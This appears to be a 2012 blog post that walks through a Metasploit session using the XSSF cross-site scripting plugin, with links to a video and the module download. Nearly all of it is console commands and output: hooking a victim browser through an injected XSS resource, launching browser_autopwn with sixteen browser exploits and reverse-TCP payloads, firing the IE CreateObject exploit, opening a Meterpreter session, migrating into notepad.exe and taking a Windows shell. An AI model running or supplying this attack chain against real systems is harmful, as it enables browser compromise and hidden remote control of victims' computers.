Monday, January 9, 2012

Cross Site Scripting Framework (XSSF)

[Video] Cross Site Scripting Framework (XSSF)
Direct Link : http://download.netqurd.com/Bl4ckViper/Videos/xssf.rar
Online : http://youtu.be/ziPv-gTFNGM
Download XSSF Module : http://www.metasploit.com/redmine/attachments/596/XSSF.zip





msf > load xssf

__ __ ______ ______ ______
/\_\_\_\ /\ ___\ /\ ___\ /\ ___\
\/_/\_\/_ \ \___ \ \ \___ \ \ \ __\
/\_\/\_\ \/\_____\ \/\_____\ \ \_\
\/_/\/_/ \/_____/ \/_____/ \/_/ Cross-Site Scripting Framework
Ludovic Courgnaud - CONIX Security

[+] Server started : http://192.168.56.101:8888/

[*] Please, inject 'http://192.168.56.101:8888/loop' resource in an XSS
[*] Successfully loaded plugin: XSSF
msf > xssf_victims

Victims
=======

id  xssf_server_id  active  ip            interval  browser_name       browser_version  cookie
--  --------------  ------  --            --------  ------------       ---------------  ------
1   1               true    192.168.56.1  2         Internet Explorer  6.0              YES

[*] Use xssf_information [VictimID] to see more information about a victim
msf > xssf_information 1

INFORMATION ABOUT VICTIM 1
============================
IP ADDRESS : 192.168.56.1
ACTIVE : TRUE
FIRST REQUEST : Tue Jul 19 23:30:25 UTC 2011
LAST REQUEST : Tue Jul 19 23:31:17 UTC 2011
CONNECTION TIME : 52.0 seconds
BROWSER NAME : Internet Explorer
BROWSER VERSION : 6.0
OS NAME : Windows
OS VERSION : XP
ARCHITECTURE : ARCH_X86
LOCATION : file:///C:/Documents and Settings/dis9team/妗棰/xss.htm
COOKIES ? : YES
RUNNING ATTACK : NONE
msf > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options

Module options:

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
LHOST                        yes       The IP address to use for reverse-connect payloads
SRVHOST     0.0.0.0          yes       The local host to listen on.
SRVPORT     8080             yes       The local port to listen on.
SSL         false            no        Negotiate SSL for incoming connections
SSLVersion  SSL3             no        Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
URIPATH                      no        The URI to use for this exploit (default is random)

msf auxiliary(browser_autopwn) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVHOST 192.168.56.101
SRVHOST => 192.168.56.101
msf auxiliary(browser_autopwn) > set SRVPORT 8081
SRVPORT => 8081
msf auxiliary(browser_autopwn) > exploit
msf auxiliary(browser_autopwn) > exploit
[*] Auxiliary module execution completed

[*] Starting exploit modules on host 192.168.56.101...
[*] ---

[*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/QlQp2UFx8EADO
[*] Server started.
msf auxiliary(browser_autopwn) > [*] Starting exploit multi/browser/java_calendar_deserialize with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/pqDNRyLmHuA
[*] Server started.
[*] Starting exploit multi/browser/java_trusted_chain with payload java/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/kXVd9wNJ7
[*] Server started.
[*] Starting exploit multi/browser/mozilla_compareto with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/zNNqGn8p
[*] Server started.
[*] Starting exploit multi/browser/mozilla_navigatorjava with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/nZqqJnbK17P2Uu
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/l45IFo
[*] Server started.
[*] Starting exploit multi/browser/opera_historysearch with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/4uYjQ9Cd
[*] Server started.
[*] Starting exploit osx/browser/safari_metadata_archive with payload generic/shell_reverse_tcp
[*] Using URL: http://192.168.56.101:8081/jUnB2WdlVh
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_marshaled_punk with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/w3xxrTDcW1D
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_rtsp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/nf21OPGpG4
[*] Server started.
[*] Starting exploit windows/browser/apple_quicktime_smil_debug with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/C7HBuD
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/GpI7DbKJ2wp5kS
[*] Server started.
[*] Starting exploit windows/browser/java_basicservice_impl with payload windows/meterpreter/reverse_tcp
[-] Exploit failed: windows/meterpreter/reverse_tcp is not a compatible payload.
[-] Failed to start exploit module windows/browser/java_basicservice_impl
[*] Starting exploit windows/browser/ms03_020_ie_objecttype with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/xFm6pSwb
[*] Server started.
[*] Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/yVJcsYOtv
[*] Server started.
[*] Starting exploit windows/browser/ms10_xxx_ie_css_clip with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/JaT9yvjsEik
[*] Server started.
[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://192.168.56.101:8081/1t4f8o9
[*] Server started.
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse handler on 192.168.56.101:3333
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse handler on 192.168.56.101:6666
[*] Starting the payload handler...
[*] Starting the payload handler...
[*] Started reverse handler on 192.168.56.101:7777
[*] Starting the payload handler...

[*] --- Done, found 16 exploit modules

[*] Using URL: http://192.168.56.101:8081/Xy5LvGuPst
[*] Server started.
msf auxiliary(browser_autopwn) > jobs

Jobs
====

Id Name
-- ----
0 Auxiliary: server/browser_autopwn
1 Exploit: multi/browser/firefox_escape_retval
2 Exploit: multi/browser/java_calendar_deserialize
3 Exploit: multi/browser/java_trusted_chain
4 Exploit: multi/browser/mozilla_compareto
5 Exploit: multi/browser/mozilla_navigatorjava
6 Exploit: multi/browser/opera_configoverwrite
7 Exploit: multi/browser/opera_historysearch
8 Exploit: osx/browser/safari_metadata_archive
9 Exploit: windows/browser/apple_quicktime_marshaled_punk
10 Exploit: windows/browser/apple_quicktime_rtsp
11 Exploit: windows/browser/apple_quicktime_smil_debug
12 Exploit: windows/browser/ie_createobject
13 Exploit: windows/browser/ms03_020_ie_objecttype
14 Exploit: windows/browser/ms10_018_ie_behaviors
15 Exploit: windows/browser/ms10_xxx_ie_css_clip
16 Exploit: windows/browser/winzip_fileview
17 Exploit: multi/handler
18 Exploit: multi/handler
19 Exploit: multi/handler
msf auxiliary(browser_autopwn) > xssf_exploit 1 12
[*] Searching Metasploit launched module with JobID = '12'...
[+] A running exploit exists : 'Exploit: windows/browser/ie_createobject'
[*] Exploit execution started, press [CTRL + C] to stop it !

[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:44018...

[+] Code 'Exploit: windows/browser/ie_createobject' sent to victim '4'
[+] Remaining victims to attack : NONE
[*] Sending Internet Explorer COM CreateObject Code Execution exploit HTML to 192.168.56.101:51709...
[*] Sending EXE payload to 192.168.56.101:60903...
[*] Sending stage (749056 bytes) to 192.168.56.1
[*] Meterpreter session 1 opened (192.168.56.101:3333 -> 192.168.56.1:37151) at Tue Jul 19 23:42:03 -0400 2011
[*] Session ID 1 (192.168.56.101:3333 -> 192.168.56.1:37151) processing InitialAutoRunScript 'migrate -f'
[*] Current server process: njoFrATVcA.exe (1728)
[*] Spawning a notepad.exe host process...
[*] Migrating into process ID 1092
[*] New server process: notepad.exe (1092)

^C[-] Exploit interrupted by the console user
msf auxiliary(browser_autopwn) > sessions

Active sessions
===============

Id  Type                   Information                                 Connection
--  ----                   -----------                                 ----------
1   meterpreter x86/win32  DIS9TEAM-7A9CFB\dis9team @ DIS9TEAM-7A9CFB  192.168.56.101:3333 -> 192.168.56.1:37151

msf auxiliary(browser_autopwn) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > shell
Process 5504 created.
Channel 1 created.
Microsoft Windows XP [ 5.1.2600]
(C)Microsoft 1985-2001 Microsoft Corp.

C:\Documents and Settings\viper
